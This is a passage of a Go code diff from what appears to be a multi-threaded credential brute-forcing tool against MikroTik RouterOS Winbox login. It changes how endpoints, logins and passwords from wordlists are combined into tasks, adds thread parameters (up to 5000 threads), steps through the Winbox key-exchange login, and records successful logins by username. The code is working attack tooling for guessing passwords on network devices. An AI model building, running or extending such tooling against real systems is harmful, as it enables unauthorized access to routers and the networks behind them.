TE_NoResponse: @@ -175,7 +184,7 @@ func GetDeferredTask() (task *Task, waitTime time.Duration) { func FetchTaskComponents() (ep *Endpoint, login string, password string, waitTime time.Duration) { var empty bool - log("task", 5, "fetching new endpoint") + log("task", 5, "fetching components for a new task") ep, waitTime = FetchEndpoint() if ep == nil { return nil, "", "", waitTime @@ -183,34 +192,40 @@ func FetchTaskComponents() (ep *Endpoint, login string, password string, waitTim log("task", 5, "fetched endpoint: \"%v\"", ep) + hasLogin := false for { log("task", 5, "fetching password for \"%v\"", ep) password, empty = SrcPassword.FetchOne(&ep.passwordPos, true) if !empty { + log("task", 5, "got password for \"%v\": %v, fetching login", ep, password) + if !hasLogin { + login, empty = SrcLogin.FetchOne(&ep.loginPos, false) + } break } - log("task", 5, "out of passwords for \"%v\": resetting and fetching new login", ep) + log("task", 5, "out of passwords for \"%v\": resetting passwords and fetching new login", ep) ep.passwordPos.Reset() login, empty = SrcLogin.FetchOne(&ep.loginPos, true) + hasLogin = true + if empty { + break + } } - log("task", 5, "got password for \"%v\": %v, fetching login", ep, password) - login, empty = SrcLogin.FetchOne(&ep.loginPos, false) - if !empty { log("task", 5, "got login for \"%v\": %v", ep, login) return ep, login, password, 0 } else { log("task", 5, "out of logins for \"%v\": exhausting endpoint", ep) ep.Exhausted() - return FetchTaskComponents() // attempt to fetch again + return FetchTaskComponents() // attempt to fetch again with a new endpoint } } // CreateTask creates a new Task element. It searches through deferred queue first, // then, if nothing was found, it assembles a new (Endpoint, login, password) combination. -func CreateTask() (task *Task, delay time.Duration) { +func CreateTask(threadIdx int) (task *Task, delay time.Duration) { taskMutex.Lock() defer taskMutex.Unlock() @@ -234,7 +249,7 @@ func CreateTask() (task *Task, delay time.Duration) { } } - t := Task{e: ep, login: login, password: password} + t := Task{e: ep, login: login, password: password, thread: threadIdx} log("task", 4, "new task: %v", &t) return &t, 0 diff --git a/thread.go b/thread.go index df04f27..b780bf9 100644 --- a/thread.go +++ b/thread.go @@ -7,6 +7,16 @@ import ( "time" ) +func init() { + registerParam("threads", 3, "how many threads to use") + registerParam("thread-delay-ms", 10, "separate threads at startup for this amount of ms") + + // using a very high limit for now, but this should actually be set to -1 + registerParam("task-max-deferrals", 30000, "how many deferrals are allowed for a single task. -1 to disable") + + registerAlias("t", "threads") +} + // maxSafeThreads is a safeguard to prevent creation of too many threads at once. const maxSafeThreads = 5000 @@ -15,7 +25,7 @@ func ThreadService() { numThreads := getParamInt("threads") failIf(numThreads > maxSafeThreads, "too many threads (max %v)", maxSafeThreads) - log("thread", 0, "initializing %v threads", numThreads) + log("thread", 1, "initializing %v threads", numThreads) c := make(chan bool) var wg sync.WaitGroup @@ -33,9 +43,8 @@ func ThreadService() { } } - log("thread", 1, "waiting for threads") wg.Wait() - log("thread", 1, "finished waiting for threads") + log("thread", 1, "finished threads") } // threadEntryPoint is the main entrypoint for a work thread. @@ -44,7 +53,7 @@ func threadEntryPoint(c chan bool, threadIdx int, wg *sync.WaitGroup) { log("thread", 3, "starting loop for thread %v", threadIdx) - for threadWork() { + for threadWork(threadIdx) { } log("thread", 3, "exiting thread %v", threadIdx) @@ -52,19 +61,21 @@ func threadEntryPoint(c chan bool, threadIdx int, wg *sync.WaitGroup) { } // threadWork processes a single work item for a thread. -func threadWork() bool { - task, delay := CreateTask() +func threadWork(threadIdx int) bool { + task, delay := CreateTask(threadIdx) if task == nil { if delay > 0 { - log("thread", 3, "no active endpoints available, sleeping for %v", delay) + log("thread", 3, "no work currently available, sleeping for %v in thread %v", delay, threadIdx) time.Sleep(delay) return true } else { - log("thread", 3, "no endpoints available (active and deferred), stopping thread loop") + log("thread", 2, "no more work for thread %v", threadIdx) return false } } + log("thread", 4, "got task %v", task) + conn, err := NewConnection(task.e) if err != nil { task.EventWithParm(TE_NoResponse, err) @@ -80,7 +91,7 @@ func threadWork() bool { task.Event(TE_ProtocolError) } else { if res && err == nil { - task.Event(TE_Good) + task.EventWithParm(TE_Good, task.login) } else { task.Event(TE_Bad) } diff --git a/winbox.go b/winbox.go index 3e72365..f662c94 100644 --- a/winbox.go +++ b/winbox.go @@ -63,13 +63,13 @@ func (winbox *Winbox) publicKeyExchange() { lx := winbox.w.liftX(NewBigintFromBytes(winbox.xwa), winbox.xwaParity) if lx == nil { - log("winbox", 1, "liftX failed in PKE") + log("winbox", 5, "liftX failed in PKE") winbox.stage = -1 return } if !winbox.w.check(lx) { - log("winbox", 1, "curve check failed") + log("winbox", 5, "curve check failed") winbox.stage = -1 return } @@ -89,7 +89,7 @@ func (winbox *Winbox) publicKeyExchange() { func (winbox *Winbox) confirmation() error { if len(winbox.resp) <= 2 { - log("winbox", 1, "response size must be greater than 2 (got %v)", len(winbox.resp)) + log("winbox", 5, "response size must be greater than 2 (got %v)", len(winbox.resp)) winbox.stage = -1 return errors.New("invalid response size") } @@ -97,7 +97,7 @@ func (winbox *Winbox) confirmation() error { respLen := winbox.resp[0] winbox.resp = winbox.resp[2:] if len(winbox.resp) != int(respLen) { - log("winbox", 1, "invalid challenge response size: got %v, expected %v", len(winbox.resp), respLen) + log("winbox", 5, "invalid challenge response size: got %v, expected %v", len(winbox.resp), respLen) winbox.stage = -1 return errors.New("invalid challenge response size") } @@ -113,7 +113,7 @@ func (winbox *Winbox) confirmation() error { if len(salt) != 16 { // this means that there is no such login, // or that its an old routeros version - log("winbox", 1, "invalid salt size: got %v, expected 16", len(salt)) + log("winbox", 5, "invalid salt size: got %v, expected 16", len(salt)) // report this finding to endpoint manager winbox.task.EventWithParm(TH_NoSuchLogin, winbox.user) @@ -142,13 +142,13 @@ func (winbox *Winbox) sendAndRecv() error { winbox.msg = []byte{} if err != nil { - log("winbox", 1, "failed to send: %v", err.Error()) + log("winbox", 5, "failed to send: %v", err.Error()) return err } winbox.resp, err = winbox.conn.Recv() if err != nil { - log("winbox", 1, "failed to recv: %v", err.Error()) + log("winbox", 5, "failed to recv: %v", err.Error()) return err } } @@ -157,16 +157,16 @@ func (winbox *Winbox) sendAndRecv() error { } func (winbox *Winbox) TryLogin() (result bool, err error) { - log("winbox", 2, "login: stage 1, PKE") + log("winbox", 4, "login: stage 1, PKE") winbox.publicKeyExchange() - log("winbox", 2, "login: stage 1, PKE OK, sending") + log("winbox", 4, "login: stage 1, PKE OK, sending") err = winbox.sendAndRecv() if err != nil { return false, err } - log("winbox", 2, "login: stage 2, confirmation") + log("winbox", 4, "login: stage 2, confirmation") err = winbox.confirmation() if err != nil { return false, err @@ -176,13 +176,13 @@ func (winbox *Winbox) TryLogin() (result bool, err error) { return false, nil // report that its a bad login } - log("winbox", 2, "login: stage 2, confirmation OK, sending") + log("winbox", 4, "login: stage 2, confirmation OK, sending") err = winbox.sendAndRecv() if err != nil { return false, err } - log("winbox", 2, "login: stage 3") + log("winbox", 4, "login: stage 3") a1 := append(winbox.j, winbox.clientCC...) winbox.serverCC = getSHA2Digest(append(a1, winbox.z...))